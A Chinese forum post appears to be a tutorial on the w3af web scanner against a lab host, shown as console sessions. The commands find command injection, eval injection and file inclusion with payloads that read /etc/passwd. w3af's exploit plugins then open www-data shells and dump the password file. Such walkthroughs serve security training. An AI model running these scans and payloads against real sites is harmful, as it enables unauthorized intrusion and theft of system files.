切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
352 W3AF 多个URL[复制链接]
发表于 2012-11-10 20:22:13 | 显示全部楼层 |!read_mode!
默认只扫描一个页面 如
  1. w3af/plugins>>> audit osCommanding
  2. w3af/plugins>>> audit eval         
  3. w3af/config:target>>> set target http://5.5.5.3/pen/share/info.php?arg=phpinfo%28%29;
  4. w3af/config:target>>> back
  5. w3af>>> start
  6. Found 1 URLs and 1 different points of injection.
  7. The list of URLs is:
  8. - http://5.5.5.3/pen/share/info.php
  9. The list of fuzzable requests is:
  10. - http://5.5.5.3/pen/share/info.php | Method: GET | Parameters: (arg="phpinfo()")
  11. OS Commanding was found at: "http://5.5.5.3/pen/share/info.php", using HTTP method GET. The sent data was: "arg=%60%2Fbin%2Fcat%20%2Fetc%2Fpasswd%60". This vulnerability was found in the request with id 24.
  12. eval() input injection was found at: "http://5.5.5.3/pen/share/info.php", using HTTP method GET. The sent data was: "arg=phpinfo%28%29". This vulnerability was found in the requests with ids 34, 38, 42 and 46.
  13. Scan finished in 11 seconds.
复制代码


你需要启动爬虫


  1. w3af/plugins>>> discovery webSpider
复制代码


但是新版本的出错
用apt-get安装

apt-get install w3af w3af_console

别用/OPT里面那个

进入到/USR/BIN 里面

  1. cp python2.7 python2.5
复制代码

进行爬虫扫描
直接输入 w3af_console 启动

  1. w3af/plugins>>> discovery webSpider    #启动爬虫
  2. w3af/plugins>>> audit sqli blindSqli
  3. w3af/plugins>>> output textFile #TEXT记录
  4. w3af/config:target>>> set target http://www.webscantest.com/
  5. w3af/config:target>>> back
  6. w3af>>> start
复制代码

然后就会爬虫 扫描各个链接输出报告在/usr/share/w3af/

  1. root@Dis9Team:~# w3af_console -i /pen/msf3/
  2. w3af>>> plugins discovery allowedMethods webSpider
  3. w3af>>> target set target http://5.5.5.3/pen/        
  4. w3af>>> start
  5. w3af>>> target set target http://5.5.5.3/pen/file.php?cat=about.txt
  6. w3af>>> plugins audit localFileInclude
  7. w3af>>> start
  8. Local File Inclusion was found at: "http://5.5.5.3/pen/file.php", using HTTP method GET. The sent data was: "cat=/etc/passwd". This vulnerability was found in the request with id 373.
  9. Finished scanning process.
复制代码

扫到漏洞包含
  1. w3af>>> target set target http://5.5.5.3/pen/share/index.php?ls=test
  2. w3af>>> plugins audit osCommanding
  3. w3af>>> start
  4. OS Commanding was found at: "http://5.5.5.3/pen/share/index.php", using HTTP method GET. The sent data was: "ls=%26%26ping+-c+9+localhost". This vulnerability was found in the request with id 809.
  5. Local File Inclusion was found at: "http://5.5.5.3/pen/file.php", using HTTP method GET. The sent data was: "cat=/etc/passwd". This vulnerability was found in the request with id 373.
复制代码

命令行执行
  1. OS Commanding was found at: "http://5.5.5.3/pen/share/index.php", using HTTP method GET. The sent data was: "ls=%26%26ping+-c+9+localhost". This vulnerability was found in the request with id 809.
复制代码

利用:
  1. w3af>>> exploit         
  2. w3af/exploit>>> exploit
  3. Exploit a vulnerability found by audit plugins.
  4. Sintax: exploit {plugin [vulnerability-id] | * [stopOnFirst]}
  5. When using "exploit *" you will be running all exploit plugins, ordered by the probability of getting a root shell. When you add the "stopOnFirst" option to the "exploit *" command, you are making w3af stop on the first successbody exploit.
  6. Examples:
  7. - exploit *
  8. - exploit osCommanding
  9. - exploit osCommanding 5
  10. w3af/exploit>>> exploit osCommanding
  11. Unknown plugin. Use the list command to view available plugins.
  12. w3af/exploit>>> exploit osCommandingShell
  13. osCommandingShell exploit plugin is starting.
  14. The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed.
  15. Vulnerability successfully exploited. This is a list of available shells and proxies:
  16. - [0] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  17. Please use the interact command to interact with the shell objects.
  18. w3af/exploit>>>
复制代码

获得SHELL- [0]包含漏洞
  1. w3af/exploit>>> exploit localFileReader
  2. localFileReader exploit plugin is starting.
  3. The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed.
  4. Vulnerability successfully exploited. This is a list of available shells and proxies:
  5. - [0] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  6. - [1] <shell object (rsystem: "linux")>
  7. Please use the interact command to interact with the shell objects.
  8. w3af/exploit>>>
复制代码

链接
  1. w3af/exploit>>> interact
  2. This is a list of available shells and proxies:
  3. - [0] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  4. - [1] <shell object (rsystem: "linux")>
复制代码

两个会话
  1. w3af/exploit>>> interact 0
  2. Execute "endInteraction" to get out of the remote shell. Commands typed in this menu will be runned through the osCommandingShell shell
  3. w3af/exploit/osCommandingShell-0>>> id
  4. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  5. w3af/exploit/osCommandingShell-0>>> ls
  6. index.php
  7. info.php
  8. w3af/exploit/osCommandingShell-0>>> endInteraction
复制代码

另外一个
  1. w3af/exploit>>> interact
  2. This is a list of available shells and proxies:
  3. - [0] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  4. - [1] <shell object (rsystem: "linux")>
  5. w3af/exploit>>> interact 1
  6. w3af/exploit/localFileReader-1>>> cat /etc/passwd
  7. root:x:0:0:root:/root:/bin/bash
  8. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  9. bin:x:2:2:bin:/bin:/bin/sh
  10. sys:x:3:3:sys:/dev:/bin/sh
  11. sync:x:4:65534:sync:/bin:/bin/sync
  12. games:x:5:60:games:/usr/games:/bin/sh
  13. man:x:6:12:man:/var/cache/man:/bin/sh
  14. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  15. mail:x:8:8:mail:/var/mail:/bin/sh
  16. news:x:9:9:news:/var/spool/news:/bin/sh
  17. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  18. proxy:x:13:13:proxy:/bin:/bin/sh
  19. www-data:x:33:33:www-data:/var/www:/bin/sh
  20. backup:x:34:34:backup:/var/backups:/bin/sh
  21. list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  22. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  23. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  24. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  25. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  26. syslog:x:101:103::/home/syslog:/bin/false
  27. messagebus:x:102:105::/var/run/dbus:/bin/false
  28. avahi-autoipd:x:103:108:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
  29. avahi:x:104:109:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
  30. usbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false
  31. gdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false
  32. speech-dispatcher:x:107:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
  33. kernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
  34. pulse:x:109:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
  35. rtkit:x:110:119:RealtimeKit,,,:/proc:/bin/false
  36. hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
  37. saned:x:112:121::/home/saned:/bin/false
  38. brk:x:1000:1000:Dis9Team,,,:/home/brk:/bin/bash
  39. postgres:x:113:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
  40. smmta:x:114:124:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
  41. smmsp:x:115:125:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
  42. vboxadd:x:999:1::/var/run/vboxadd:/bin/false
  43. sshd:x:116:65534::/var/run/sshd:/usr/sbin/nologin
  44. mysql:x:1001:110::/home/mysql:/bin/false
  45. kippo:x:1002:1002::/home/kippo:/bin/bash
  46. honeyd:x:117:115:Honeyd daemon,,,:/var/log/honeypot:/bin/false
  47. a:x:1003:33::/dev/null:/usr/sbin/nologin
  48. b:x:1004:33::/dev/null:/usr/sbin/nologin

  49. w3af/exploit/localFileReader-1>>>
  50. w3af/exploit/localFileReader-1>>> endInteraction
复制代码

全部插件
  1. w3af>>> plugins audit all
  2. w3af>>> target set target http://5.5.5.3/pen/
  3. w3af>>> start
复制代码

全部漏洞利用
  1. w3af>>> exploit exploit *
  2. Please use the interact command to interact with the shell objects.
  3. w3af>>> exploit interact
  4. This is a list of available shells and proxies:
  5. - [0] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  6. - [1] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  7. - [2] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  8. - [3] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  9. - [4] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  10. - [5] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  11. - [6] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  12. - [7] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  13. - [8] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  14. - [9] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  15. - [10] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  16. - [11] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  17. - [12] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  18. - [13] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  19. - [14] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  20. - [15] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  21. - [16] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  22. - [17] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  23. - [18] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  24. - [19] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  25. - [20] <osCommandingShell object (ruser: "www-data" | rsystem: "Linux ubuntu 2.6.35-22-generic-pae i686 GNU/Linux")>
  26. - [21] <shell object (rsystem: "linux")>
  27. - [22] <shell object (rsystem: "linux")>
  28. - [23] <shell object (rsystem: "linux")>
  29. - [24] <shell object (rsystem: "linux")>
  30. - [25] <shell object (rsystem: "linux")>
  31. - [26] <shell object (rsystem: "linux")>
  32. w3af>>>
复制代码

链接
  1. w3af>>> exploit interact ID
复制代码




操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-28 07:04

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部